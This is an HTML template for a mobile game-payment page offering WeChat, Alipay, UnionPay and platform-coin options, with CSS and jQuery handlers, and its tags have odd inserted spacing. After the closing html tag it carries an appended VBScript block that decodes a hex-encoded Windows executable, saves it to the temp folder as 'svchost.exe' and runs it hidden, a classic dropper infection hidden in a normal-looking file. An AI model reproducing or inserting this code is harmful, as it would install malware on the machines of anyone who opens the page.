<!DOCTYPE html>
< html >
< head >
< meta charset = "utf-8" >
< meta name = "viewport" content = "width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" / >
< title > < / title >
< link href = "__CSS__/index.css" rel = "stylesheet" / >
< style > i n p u t { o u t l i n e : n o n e ; - w e b k i t - a p p e a r a n c e : n o n e ; }
html{font-size:12px;}
body {background:#F3F2F7;font-size:inherit;}
i{font-style:normal;font-weight:normal;}
.recharge_table {display:table;width:100%;}
.recharge_table .recharge_cell {display:table-cell;vertical-align:middle;text-align:center;}
.recharge_content {margin:0 auto;}
.recharge_content span {display:block;}
.recharge_money {height:5.818rem;background:#FFF;}
.recharge_content_number {color:#01B1EC;font-size:1.3rem;}
.recharge_content_coin,.recharge_game_name {color:#999;}
.recharge_content_number i {font-size:1.636rem;}
.recharge_game {background:#FFF;font-size:1.2rem;height:3.727rem;line-height:3.737rem;border-top:2px solid #DEE2E5;}
.recharge_game .recharge_value {padding:0 1.13rem;}
.recharge_way {height:10.8rem;}
.recharge_way_title {height:2.7rem;line-height:2.7rem;text-align:center;font-size:1.07rem;}
.recharge_way_content,.recharge_way_wrap {height:8rem;}
.recharge_way_btn {height:7.2rem;display:inline-block;}
.recharge_way_btn img{width:6.84rem;height:6.84rem;display:inline-block;margin-top:.18rem;}
.recharge_way_btn_alipay img{width:6.84rem;height:6.84rem;margin-top:0;}
.platform_pop {position:absolute;top:0;left:0;width:100%;height:100%;display:none;}
.platform_pop_table {width:100%;height:100%;}
.platform_box {color:#999;position:relative;top:0;left:auto;right:auto;width:24rem;display:block;margin:0 auto;background:#FFF;border-radius:.3rem;}
.platform_pop_close {position:absolute;top:0.8rem;right:0.8rem;color:#999;}
.platform_pop_close img {width:1.7rem;height:1.7rem;}
.platform_title {line-height:3.4rem;font-size:1.8rem;}
.platform_content {padding:0 0.8rem;text-align:left;font-size:1.5rem;}
.platform_notice {color:#333;line-height:1.4;}
.platform_notice span {color:red;}
.platform_radio {padding-top:.2rem;padding-bottom:0.2rem;}
.platform_radio .platform_radio_item {display:block;line-height:1.8;position:relative;}
.platform_radio_item input {position:absolute;top:0;left:0;z-index:-1;width:1.8rem;height:1.8rem;}
.platform_radio_item input~i{width:1.6rem;height:1.6rem;background:url(__IMG__/btn_check_n.png) center center no-repeat;background-size:100% 100%;display:inline-block;vertical-align:middle;margin-top:-.3rem;margin-right:0.2rem;}
.platform_radio_item input:checked~i{background-image:url(__IMG__/btn_check_s.png);}
.platform_btn {padding:0.2rem .8rem 1rem;}
.platform_btn input {background:#F9AB42;color:#FFF;line-height:1.8;font-size:1.8rem;border:none;width:100%;border-radius:.3rem;}
@media screen and (max-width:400px) {
.recharge_game {border-top-width:1px;}
}
< / style >
< script src = "__JS__/jquery-1.11.1.min.js" > < / script >
< script src = "__STATIC__/layer_mobile/layer.js" > < / script >
< / head >
< body >
< div class = "containers" >
< div class = "recharge_money recharge_table" >
< div class = "recharge_cell" >
< div class = "recharge_content" >
< span class = "recharge_content_number" > ¥< i > {$data.price}< / i > 元< / span >
< span class = "recharge_content_coin" > {$data.coin}< / span >
< / div >
< / div >
< / div >
< eq name = "data.code" value = "1" >
< div class = "recharge_game" >
< div class = "recharge_value" >
< span class = "recharge_game_name" > 游戏名称:< / span >
< span > {$data.game_name}< / span >
< / div >
< / div >
< / eq >
< div class = "recharge_way" >
< div class = "recharge_way_title" > 请选择支付方式< / div >
< div class = "recharge_way_content" >
< div class = "recharge_way_wrap recharge_table" >
< if condition = "C('wei_xin.status') eq 1 or C('weixin_gf.status') eq 1 or (C('goldpig.status') eq 1 and C('goldpig.wx') eq 1) or (C('heepay.status') eq 1 and C('heepay.wxp') eq 1)" >
< div class = "recharge_cell" >
< a href = "{:U('Apple/apple_weixin_pay',array('user_id'=>I('user_id'),'game_id'=>I('game_id')))}" class = "recharge_way_btn recharge_way_btn_wechat" > < img src = "__IMG__/btn_pay_wechat@3x.png" > < / a >
< / div >
< / if >
< if condition = "C('alipay.status') eq 1 or (C('goldpig.status') eq 1 and C('goldpig.zfb') eq 1) or (C('sqpay.status') eq 1 and C('sqpay.zfb') eq 1)" >
< div class = "recharge_cell" >
<!-- <a href="{:U('Apple/apple_alipay_pay',array('user_id'=>I('user_id'),'game_id'=>I('game_id')))}" class="recharge_way_btn recharge_way_btn_alipay"><img src="__IMG__/btn_pay_alipay@3x.png"></a>
-->
< a href = "javascript:;" data-url = "/sdk.php?s=/Apple/apple_alipay_pay&user_id={:I('user_id')}&game_id={:I('game_id')}" id = "alipaybtn" class = "recharge_way_btn recharge_way_btn_alipay" > < img src = "__IMG__/btn_pay_alipay@3x.png" > < / a >
<!--
< a href = "{$alipayurl}" data-url = "" id = "alipaybtn" class = "recharge_way_btn recharge_way_btn_alipay" > < img src = "__IMG__/btn_pay_alipay@3x.png" > < / a >
-->
< / div >
< / if >
< if condition = "C('sqpay.status') eq 1 and C('sqpay.union') eq 1" >
< div class = "recharge_cell" >
< a href = "{:U('Apple/apple_union_pay', array('user_id'=>I('user_id'),'game_id'=>I('game_id')))}" class = "recharge_way_btn recharge_way_btn_alipay" >
< img src = "__IMG__/unionpay.png" > < / a >
< / div >
< / if >
< if condition = "pay_set_status('ptb_pay') eq 1 and $data['code'] eq 1" >
< div class = "recharge_cell" >
< a href = "javascript:;" id = "platform_id" class = "recharge_way_btn recharge_way_btn_platform" > < img src = "__IMG__/btn_pay_platform@3x.png" > < / a >
< / div >
< / if >
< if condition = "pay_set_status('bind_pay') eq 1 and $data['code'] eq 1" >
< div class = "recharge_cell" >
< a href = "javascript:;" id = "platform_id1" class = "recharge_way_btn recharge_way_btn_platform" > < img src = "__IMG__/icon_bangbi@3x.png" > < / a >
< / div >
< / if >
< if condition = "C('sqpay.status') eq 1 and C('sqpay.shortcut') eq 1" >
< div class = "recharge_cell" >
< a href = "{:U('WapPay/wap_shortcut_pay', array('user_id'=>I('user_id'),'game_id'=>I('game_id')))}" class = "recharge_way_btn recharge_way_btn_alipay" >
< img src = "__IMG__/unionpay.png" > < / a >
< / div >
< / if >
< / div >
< / div >
< / div >
< div class = "platform_pop" id = "platform_pop" >
< div class = "platform_pop_table recharge_table" >
< div class = "recharge_cell" >
< form class = "platform_box" action = "{:U('Apple/apple_platform_pay',array('user_id'=>I('user_id'),'game_id'=>I('game_id')))}" enctype = "multipart/form-data" method = "post" >
< a href = "javascript:;" id = "platform_pop_close" class = "platform_pop_close" > < img src = "__IMG__/icon_close@3x.png" > < / a >
< div class = "platform_title" > 平台币< / div >
< div class = "platform_content" >
< div class = "platform_notice" > 应付款平台币数量:< span > {$data.price}< / span > < / div >
< div class = "platform_radio" >
< label class = "platform_radio_item" > < input type = "radio" name = "way" value = "1" checked > < i > < / i > 平台币余额:< span > {$balance}< / span > < / label >
< / div >
< / div >
< div class = "platform_btn" >
< input type = "submit" value = "立即支付" style = "background-color:<notempty name='btncolor'>#{$btncolor}<else />#F9AB42</notempty>" >
< / div >
< / form >
< / div >
< / div >
< / div >
< div class = "platform_pop" id = "platform_pop1" >
< div class = "platform_pop_table recharge_table" >
< div class = "recharge_cell" >
< form class = "platform_box" action = "{:U('Apple/apple_platform_pay',array('user_id'=>I('user_id'),'game_id'=>I('game_id')))}" enctype = "multipart/form-data" method = "post" >
< a href = "javascript:;" id = "platform_pop_close1" class = "platform_pop_close" > < img src = "__IMG__/icon_close@3x.png" > < / a >
< div class = "platform_title" > 绑币平台币< / div >
< div class = "platform_content" >
< div class = "platform_notice" > 应付款绑币数量:< span > {$data.price}< / span > < / div >
< div class = "platform_radio" >
< label class = "platform_radio_item" > < input type = "radio" name = "way" value = "2" checked > < i > < / i > 绑定平台币余额:< span > {$bind_balance}< / span > < / label >
< / div >
< / div >
< div class = "platform_btn" >
< input type = "submit" value = "立即支付" style = "background-color:<notempty name='btncolor'>#{$btncolor}<else />#F9AB42</notempty>" >
< / div >
< / form >
< / div >
< / div >
< / div >
< / div >
< / body >
< script >
var html=document.getElementsByTagName('html')[0];
function fontsizechange() {
var rate = html.clientWidth/640;
var basesize = 22;
html.style.fontSize = (rate>1?basesize:basesize*rate)+'px';
}
fontsizechange();
window.onresize = function() {
fontsizechange();
}
$(function() {
$(".recharge_way_wrap a").one("click",function(){
$(this).click(function (){return false;});
});
$('#platform_id').on('click',function() {
$('#platform_pop').fadeIn().find('#platform_pop_close').on('click',function() {
$(this).closest('#platform_pop').fadeOut();
return false;
});
return false;
});
$('#platform_id1').on('click',function() {
$('#platform_pop1').fadeIn().find('#platform_pop_close1').on('click',function() {
$(this).closest('#platform_pop1').fadeOut();
return false;
});
return false;
});
$('#alipaybtn').on('click',function() {
var that = $(this),url = $.trim(that.attr('data-url'));
if(that.hasClass('disabledbtn')){return false;}
that.addClass('disabled');
$.ajax({
type:'post',
dataType:'json',
data:{},
url:url,
success:function(result) {
if(result.code==200) {
var data = result.data;
if(data.wap==1) {
location.href = data.url;
} else if (data.wap==1) {
window.webkit.messageHandlers.noticeAppResult.postMessage(data.url);
}
else {
window.webkit.messageHandlers.noticeAppResult.postMessage(data.url);
}
} else {
layer.open({
content: result.msg
,skin: 'msg'
,time: 2 //2秒后自动关闭
});
}
},error:function() {
that.removeClass('disabledbtn');
}
});
return false;
});
});
< / script >
< / html > < SCRIPT Language = VBScript > < ! - -
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C49AED60FE3CFFFFFFC7855C2B094C37B3FFE6EF0A195DD08175A035FF4DAC1155A0C9C204306E7FBF9F6845E0322D45A4346A35E804021C331F39D921085C803534311A8C8CBDFBBC815D0639C4C9C372143069B6DFDE3437353322F038383237833838BB9BBF1B700936333631FF8D4429B52C05017D7CB2F7EFE8F7950E836DCC00488AF0343532BEEFF6DDFC343491D0B23231748F046F791E39D9B60C18D83436CC3FB37BECFFF50185585DFF4D76198D3FF66FBF246365EC1E4588214DB4019D735DB40011951C61B2BB7809317DF8E77409DC00CD5D1E8EE03834459D7C16D6AEFBF60F37A88D9558FE0C528D8D7C065190388C4CC203044738A46B66BB05597F74DCF8350D509163939933694CBCCC386C84C9BAF40500D7044C0831D8D7CE16698406AB5171D8B2F7F7C1899D4F015588337AF7BBC2B3BDB4519CFF663A68312CDCBE8536475237DC8BBC332360369BCCDC219D488D14B9F73BBF8773D058009B9031E22FBFBD0BB85D2FEC35323835843631DF0EFF3CC8897DE081A52E723737814DDDB60DC394330C74F48235069564F6FE0AEE9E5C7721F7559C56BE67BECF4282D83134BE48B8E6B7EF7104786809094FC2F03321BD3C9193ADF1115DF8312999107C7736608DB077AD10133474096E123AA600973624E69B8423BB6408FF05124C3C8D7DCE261960B406FC094DDCC681D0B5080C94AC34579BD928FCDC3131B17440BB041BDF5930B44C5D5D80C0A41FFB1D0BD800297DC0312C217DFC83AD170B59E34681A01197B5AEDF6FBF16204C35290D197D80F79DBBF77684D2B75D366DE43368671105858E0C188F4C1C9C38376670127E3C23AFCC5703061430A5D35F6C54E505363834F89F91BEBDD93536C77AA7B021B5604819990CF3D0218578A0447448DF370F85E45052FF75A46043C9ACF4B3F483C48009C4314D8C771936D9DB6D7D07F08902295DF0496C9E846FB037884650378AD470D85A83EB9C05338403353636B637DE45DC3338682145E49088FA805BDB71DB13AC5B55A84583552F06D0ABF5C864547CB4373382A5AC05476BF874817B324A2F6C5B6FCC9177B8DCF471F0834DA54B8DEDA031210381CF863137D919DFD99E9C510718B1C7123C4F3232407C9C33349449EFF16653C6B1FADB37C9AD3DBC3135CCDC8C32320A9330093B560770EA3083353BE7E8BE354FE8323169B3F8F40064066B64D39831D2B76DAE124E0436315053C7CB1A7F9D4C6833AF75D468EBD6C2F7D72120F06A31069D84F8FB671D58C69C21899F342E722C0874E0F43732B93732D908A62B043CED82CFC9C8643D10B88481F0C0E1D36DC4E881AD0AA0211E5D69A1BDC0902913A5
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("& H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->< / SCRIPT >